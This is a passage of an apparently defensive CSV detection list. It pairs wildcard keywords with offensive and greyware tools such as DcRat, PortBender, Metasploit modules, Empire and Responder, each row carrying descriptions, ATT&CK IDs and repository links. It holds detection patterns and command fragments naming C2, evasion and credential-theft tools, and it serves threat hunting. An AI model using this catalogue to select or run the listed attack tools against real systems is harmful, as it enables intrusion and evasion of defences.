Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Plugins\SendFile.dll*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,0,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*Plugins\SendMemory.dll*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,0,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*plummm/CVE-2022-27666*,offensive_tool_keyword,POC,Exploit for CVE-2022-27666,T1550 - T1555 - T1212 - T1558,TA0005,N/A,N/A,Exploitation tools,https://github.com/plummm/CVE-2022-27666,1,1,N/A,N/A,3,203,41,2022-03-28T18:21:00Z,2022-03-23T22:54:28Z -*pm3 -p /dev/ttyACM0*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*poc.bash*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.bat*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.bin*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.exe*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.exe*poc.txt*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*poc.msi*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.pl*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.ps1*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.reg*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.run*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.sh*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.vb*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.vbe*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.vbs*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.vbscript*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.zsh*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*POC_CloudFilter_ArbitraryFile_EoP*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*POC_CloudFilter_ArbitraryFile_EoP.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*POC_DLL.dll*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*POC1*implant.cpp*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,0,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*POC2*implant.cpp*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,0,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*pocs_go/*/CVE-*.go*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*podalirius@protonmail.com*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*podman run * --name avred -d avred*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,0,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*poeojclicodamonabcabmapamjkkmnnk*,greyware_tool_keyword,HMA VPN Proxy Unblocker,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*poetry run bofhound*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*poetry run NetExec *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*poison_ivy_c2*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Poisoners-Session.log*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*poisonivy_bof.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*poisontap*,offensive_tool_keyword,poisontap,PoisonTap - siphons cookies. exposes internal router & installs web backdoor on locked computers,T1534.002 - T1059.001 - T1053.005 - T1564.001,TA0002 - TA0007 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/samyk/poisontap,1,0,N/A,N/A,10,6026,1027,2018-11-26T16:50:44Z,2016-11-16T11:51:34Z -*polenum *-protocols *,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*polenum -h*,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*pony-02.aftxt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*pooljnboifbodgifngpppfklhifechoe*,greyware_tool_keyword,GeoProxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*poor buffer accounting in str_netfd_alloc*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*pornhub.py*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,0,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -*port and pasv both active*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*port_forward_pivot.py*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*PortBender backdoor*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,0,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*PortBender redirect*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,0,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*PortBender.cna*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*PortBender.cpp*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*portbender.dll*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*PortBender.exe*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*PortBender.h*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*PortBender.sln*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z 